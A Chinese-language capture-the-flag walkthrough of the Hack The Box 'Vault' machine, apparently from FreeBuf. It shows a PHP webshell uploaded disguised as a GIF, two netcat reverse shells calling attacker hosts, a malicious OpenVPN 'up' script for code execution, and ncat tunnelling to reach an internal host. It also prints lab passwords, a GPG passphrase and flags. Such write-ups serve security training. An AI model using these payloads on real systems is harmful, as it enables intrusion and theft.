[Meachines] [Medium] Vault OpenVPN RCE+NC代理横向移动+GPG解密
Information Gathering
IP Address | Opening Ports |
---|---|
10.10.10.109 | TCP:22,80 |
$ ip='10.10.10.109'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a69d0f7d7375bba8940ab7e3fe1f24f4 (RSA)
| 256 2c7c34eb3aeb0403ac48285409743d27 (ECDSA)
|_ 256 98425fad8722926d72e6666c82c10983 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Upload Webshell
http://10.10.10.109/
页面中提到了Sparklays
$ feroxbuster -u 'http://10.10.10.109/sparklays' -x php
http://10.10.10.109/sparklays/design/changelogo.php
POST /sparklays/design/changelogo.php HTTP/1.1
Host: 10.10.10.109
Content-Length: 395
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.109
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyY59DQNIHLMl1e0R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.10.109/sparklays/design/changelogo.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryyY59DQNIHLMl1e0R
Content-Disposition: form-data; name="file"; filename="1.php5"
Content-Type: application/gif
GTF89A
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.27 443 >/tmp/f');?>
------WebKitFormBoundaryyY59DQNIHLMl1e0R
Content-Disposition: form-data; name="submit"
upload file
------WebKitFormBoundaryyY59DQNIHLMl1e0R--
$ curl -S http://10.10.10.109/sparklays/design/uploads/1.php5
Dave
$ cat /home/dave/Desktop/*
password:Dav3therav3123
key>itscominghome
Dave to DNS server && OpenVPN RCE
$ ssh -D 1090 [email protected]
$ time for i in $(seq 1 254); do (ping -c 1 192.168.122.${i} | grep "bytes from" &); done
BP代理到1090
http://192.168.122.4/
https://www.bleepingcomputer.com/news/security/downloading-3rd-party-openvpn-configs-may-be-dangerous-heres-why/
remote 192.168.122.1
ifconfig 10.200.0.2 10.200.0.1
dev tun
script-security 2
up "/bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.122.1 10032 >/tmp/f'"
nobind
$ cat /home/dave/ssh
dav3gerous567
User.txt
a4947faa8d4e1f80771d34234bd88c73
Privilege Escalation && NC Proxy lateral movement && gpg decrypt
$ cat /home/alex/.bash_history
$ grep -rHa "192.168.5.2" /var/log
$ nmap 192.168.5.2 -Pn -f
$ nmap 192.168.5.2 -Pn -f --source-port=4444
使用本地解析
$ nc 192.168.5.2 987 -p 53
使用NC搭建隧道
在本地监听1801端口代理。DNS服务器数据转发到192.168.5.2的987端口,并且使用本地端口53
DNS$ SHELL=/bin/sh script -q /dev/null
DNS$ /usr/bin/ncat -l 1801 --sh-exec "ncat 192.168.5.2 987 -p 53" &
DNS$ ssh dave@localhost -p 1801 -t 'bash'
dav3gerous567
$ base32 -w0 root.txt.gpg
QUBAYA6HPDDBBUPLD4BQCEAAUCMOVUY2GZXH4SL5RXIOQQYVMY4TAUFOZE64YFASXVITKTD56JHDLIHBLW3OQMKSHQDUTH3R6QKT3MUYPL32DYMUVFHTWRVO5Q3YLSY2R4K3RUOYE5YKCP2PAX7S7OJBGMJKKZNW6AVN6WGQNV5FISANQDCYJI656WFAQCIIHXCQCTJXBEBHNHGQIMTF4UAQZXICNPCRCT55AUMRZJEQ2KSYK7C3MIIH7Z7MTYOXRBOHHG2XMUDFPUTD5UXFYGCWKJVOGGBJK56OPHE25OKUQCRGVEVINLLC3PZEIAF6KSLVSOLKZ5DWWU34FH36HGPRFSWRIJPRGS4TJOQC3ZSWTXYPORPUFWEHEDOEOPWHH42565HTDUZ6DPJUIX243DQ45HFPLMYTTUW4UVGBWZ4IVV33LYYIB32QO3ONOHPN5HRCYYFECKYNUVSGMHZINOAPEIDO7RXRVBKMHASOS6WH5KOP2XIV4EGBJGM4E6ZSHXIWSG6EM6ODQHRWOAB3AGSLQ5ZHJBPDQ6LQ2PVUMJPWD2N32FSVCEAXP737LZ56TTDJNZN6J6OWZRTP6PBOERHXMQ3ZMYJIUWQF5GXGYOYAZ3MCF75KFJTQAU7D6FFWDBVQQJYQR6FNCH3M3Z5B4MXV7B3ZW4NX5UHZJ5STMCTDZY6SPTKQT6G5VTCG6UWOMK3RYKMPA2YTPKVWVNMTC62Q4E6CZWQAPBFU7NM652O2DROUUPLSHYDZ6SZSO72GCDMASI2X3NGDCGRTHQSD5NVYENRSEJBBCWAZTVO33IIRZ5RLTBVR7R4LKKIBZOVUSW36G37M6PD5EZABOBCHNOQL2HV27MMSK3TSQJ4462INFAB6OS7XCSMBONZZ26EZJTC5P42BGMXHE27464GCANQCRUWO5MEZEFU2KVDHUZRMJ6ABNAEEVIH4SS65JXTGKYLE7ED4C3UV66ALCMC767DKJTBKTTAX3UIRVNBQMYRI7XY=
dave@ubuntu$ gpg -d root.gpg
itscominghome
Root.txt
ca468370b91d1f5906e31093d9bfe819
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
目录
最新
- [Meachines] [Hard] OneTwoSeven SFTP-Symlinks+SWP+SSH-forward+apt-get-PE+Tyrant
- 俄罗斯黑客利用微软OAuth机制通过Signal和WhatsApp攻击乌克兰盟国
- 全球40余位CISO联名呼吁OECD与G7加强网络安全法规协同性
- 浏览器为何成为拦截钓鱼攻击的最佳防线:三大核心优势
- 实现另一个“编程语言” - 记第四届伏魔挑战赛恶意脚本免杀
- [Meachines] [Medium] Vault OpenVPN RCE+NC代理横向移动+GPG解密
- 打靶日记--Misdirection
- 新型恶意软件采用独特混淆技术劫持Docker镜像